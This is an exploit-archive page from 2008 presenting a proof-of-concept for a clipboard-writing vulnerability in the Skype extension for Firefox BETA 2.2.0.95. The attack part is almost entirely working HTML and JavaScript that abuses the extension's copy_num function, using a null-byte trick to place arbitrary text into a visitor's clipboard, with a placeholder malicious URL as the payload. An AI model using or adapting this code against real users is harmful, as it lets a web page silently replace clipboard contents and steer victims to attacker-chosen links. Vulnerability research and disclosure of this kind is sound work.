[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability
# Published : 2008-10-07
# Author : irk4z
# Previous Title : Microsoft PicturePusher ActiveX Cross Site File Upload Attack PoC
# Next Title : Hammer Software MetaGauge 1.0.0.17 Directory Traversal Vulnerability
<!---------------------------------------------------------------------------
Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC
download: https://developer.skype.com/SkypeToolbars
Author: irk4z[at]yahoo.pl
homepage: http://irk4z.wordpress.com/
greets: all friends
---------------------------------------------------------------------------->
<a href="#" onclick="check_it();" >test it!</a>
<script type="text/javascript">
function copy_to_clipboard( text ){
if (skype_tool) {
var copy_it = text + '�+'; //use null byte to copy value, because '+' char must be in string
skype_tool.copy_num( copy_it );
}
}
function check_it(){
//copy_to_clipboard('malicious text!!!!!!!!!!!nnn!!');
//copy_to_clipboard('http://irk4z.wordpress.com/');
copy_to_clipboard('http://malicious.link.to.bad.page/');
alert('Done! Check your clipboard!');
}
</script>
# www.Syue.com [2008-10-07]